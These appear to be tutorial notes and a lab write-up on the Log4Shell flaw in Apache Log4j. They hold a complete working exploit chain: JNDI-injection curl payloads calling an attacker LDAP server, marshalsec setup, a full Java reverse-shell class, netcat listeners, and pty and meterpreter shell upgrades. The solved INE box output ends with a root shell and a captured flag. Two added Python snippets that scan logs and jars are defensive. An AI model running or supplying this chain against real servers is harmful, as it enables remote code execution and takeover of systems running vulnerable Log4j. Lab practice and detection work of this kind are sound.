Log4j Vulnerability (Log4Shell)
Vulnerability reported on 9/Dec/2021 in the Apache Java logging library Log4j.
Background:
1- A quick 3-minute video from Marcus Hutchins on what all the fuss is about:
GOVCERT:
A more practical demonstration from Sophos:
Tutorial Notes:
Check if the server is vulnerable:
1- Start a listener:
nc -nlvp 1234
2- Send a request to the potentially vulnerable parameter:
curl '<url>?cmd=${jndi:ldap://<attacker_IP>:1234}'
If nc receives a connection (the callback), the target is vulnerable.
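The same lookup string that makes this check work is also what a defender should be hunting for in web server access logs. The following Python is an added example (not part of the original notes): it scans constructed Tomcat-style access log lines for a `${jndi:` lookup and pulls out the callback scheme, host and port so the indicator can be blocked and triaged. It assumes the access log stores the raw request line, which may be percent-encoded by the client, so each line is URL-decoded before matching.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (combined log format); not taken from any real server.
SAMPLE_LOG = """\
192.10.137.2 - - [08/Jan/2022:15:40:01 +0530] "GET /login?cmd=${jndi:ldap://192.10.137.2:1389/Exploit} HTTP/1.1" 200 512
192.10.137.9 - - [08/Jan/2022:15:41:12 +0530] "GET /login?cmd=hello HTTP/1.1" 200 512
192.10.137.2 - - [08/Jan/2022:15:42:30 +0530] "GET /login?cmd=%24%7Bjndi%3Aldap%3A%2F%2F192.10.137.2%3A1389%2FExploit%7D HTTP/1.1" 200 512
"""

# A JNDI lookup string as Log4j 2.x would interpret it: "${jndi:" followed by a scheme.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Captures scheme, host and optional port of the callback inside the lookup.
CALLBACK_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)


def find_jndi_lookups(log_text):
    """Return a list of (line_number, decoded_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        decoded = unquote(line)  # undo percent-encoding applied by the HTTP client
        if JNDI_RE.search(decoded):
            hits.append((number, decoded))
    return hits


def extract_callback(decoded_line):
    """Return (scheme, host, port) of the callback server named in the lookup, or None.

    port is an int when present in the lookup, otherwise None.
    """
    match = CALLBACK_RE.search(decoded_line)
    if not match:
        return None
    port = match.group("port")
    return (match.group("scheme").lower(), match.group("host"), int(port) if port else None)


if __name__ == "__main__":
    for number, line in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup -> callback {extract_callback(line)}")
```

Both the literal and the percent-encoded request in the sample are flagged, and each yields the callback `('ldap', '192.10.137.2', 1389)`, which is exactly the listener address a responder would want to block at the egress firewall and search for across other hosts.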
Exploiting the vulnerability with your own LDAP server:
We will use the following script to automate the process: https://github.com/kozmer/log4j-shell-poc
1- Set up an LDAP server so the target's lookup gets a reference back:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<attacker_IP>:8080/#Exploit"
#Exploit is the name of the exploit class we will create.
Inside poc.py the Java code is present (in a comment); copy it to a new file named Exploit.java, since that is the exploit, and fill in your values:
String host="<attacker_IP>";
int port=<nc_port>;
2- Compile the exploit:
javac Exploit.java -source 8 -target 8
-source: Java language version of the source file
-target: JDK (class-file) version to compile for
One warning is printed; don't worry about it.
3- Set up a web server to host the Exploit class:
python -m SimpleHTTPServer 8080
8080 because that's the HTTP port in the URL we gave the LDAP server in step 1.
4- Set up a listener to receive the connection from the target once it's exploited:
nc -nlvp 9999
Same port as the one in Exploit.java.
5- Attack (send the request):
curl '<target_url>?cmd=${jndi:ldap://<attacker_ip>:<ldap_port>/Exploit}'
<ldap_port>: the port the LDAP server from step 1 is listening on.
No need to add the .class extension; the LDAP reference resolves the class name by itself.
🎉Now nc receives a connection and you have a reverse shell.🎉
You can spawn a proper bash shell:
python -c 'import pty;pty.spawn("/bin/bash")'
And of course, you can upgrade to a meterpreter shell:
use multi/handler
set LHOST <attacker_ip>
set LPORT <port in java code>
run
background
sessions -u 1 <- this uses the shell_to_meterpreter module
Solving INE Box:
target: demo.ine.local
My IP: 192.10.137.2
Footprinting:
~# nmap -sV demo.ine.local
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-08 15:37 IST
Nmap scan report for demo.ine.local (192.10.137.3)
Host is up (0.0000090s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache Tomcat 8.5.3
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
The target runs Apache Tomcat; by default Tomcat doesn't depend on Log4j, but it can be configured to use it.
Apache JServ (AJP) is interesting but not the target here; I know this version is vulnerable.
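Since Tomcat only pulls Log4j in when an application ships it, the defender's counterpart to "I know this version is vulnerable" is to inspect the jars actually deployed. The Python below is an added example (not from the original notes or the PoC project): it opens a jar in memory and reports whether it still contains `org/apache/logging/log4j/core/lookup/JndiLookup.class`, the class Apache's published mitigation for CVE-2021-44228 tells you to delete, and reads the artifact version from the Maven `pom.properties` entry when present. The jars it checks are constructed in memory for the demonstration; on a real host you would point it at `WEB-INF/lib/*.jar` or `$CATALINA_HOME/lib/*.jar`.

```python
import io
import zipfile

# Class that performs the JNDI lookup; Apache's mitigation removes it from log4j-core.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven-built jars carry their coordinates here (present in real log4j-core jars).
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def inspect_jar(jar_bytes):
    """Return (has_jndi_lookup, version) for a jar supplied as bytes.

    has_jndi_lookup is True when JndiLookup.class is still packaged;
    version is the pom.properties version string, or None if absent.
    """
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for raw in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if raw.startswith("version="):
                    version = raw.split("=", 1)[1].strip()
        return JNDI_LOOKUP_CLASS in names, version


def inspect_jar_file(path):
    """Convenience wrapper for a jar on disk."""
    with open(path, "rb") as fh:
        return inspect_jar(fh.read())


def build_sample_jar(with_lookup, version):
    """Construct a minimal fake log4j-core jar in memory (sample data, not a real jar)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr(
            POM_PROPS,
            f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n",
        )
        if with_lookup:
            # Only the entry name matters for this check; the content is a dummy class header.
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    for label, jar in (
        ("unpatched sample", build_sample_jar(True, "2.14.1")),
        ("class-removed sample", build_sample_jar(False, "2.14.1")),
    ):
        has_lookup, version = inspect_jar(jar)
        print(f"{label}: version={version} JndiLookup present={has_lookup}")
```

A jar that still contains `JndiLookup.class` is the one to act on, regardless of what the version string says; a jar where the class has been removed has had the published class-deletion mitigation applied.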
Checking for the vulnerability:
nc -nlvp 1234
curl 'http://demo.ine.local/login?cmd=${jndi:ldap://192.10.137.2:1234}'
We got a response in nc, so it's vulnerable...😀
Time to exploit it:
my LDAP:
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.10.137.2:8080/#Exploit"
Listening on 0.0.0.0:1389
nc listener:
nc -nlvp 9999
Compiling the Java exploit (reverse shell):
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {
    public Exploit() throws Exception {
        String host="192.10.137.2";
        int port=9999;
        String cmd="/bin/sh";
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s=new Socket(host,port); // semicolon was missing in the original copy
        InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
        OutputStream po=p.getOutputStream(),so=s.getOutputStream();
        while(!s.isClosed()) {
            while(pi.available()>0)
                so.write(pi.read());
            while(pe.available()>0)
                so.write(pe.read());
            while(si.available()>0)
                po.write(si.read());
            so.flush();
            po.flush();
            Thread.sleep(50);
            try {
                p.exitValue();
                break;
            }
            catch (Exception e){}
        };
        p.destroy();
        s.close();
    }
}
javac Exploit.java -source 8 -target 8
Server hosting the Exploit class:
python -m SimpleHTTPServer 8080
Exploit:
curl 'http://demo.ine.local/login?cmd=${jndi:ldap://192.10.137.2:1389/Exploit}'
Goal achieved:
root@INE:~# nc -nlvp 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.10.137.3.
Ncat: Connection from 192.10.137.3:46500.
ls
FLAG
tomcat8
cat FLAG
33fbfa01ec2f791096f13e01988a164e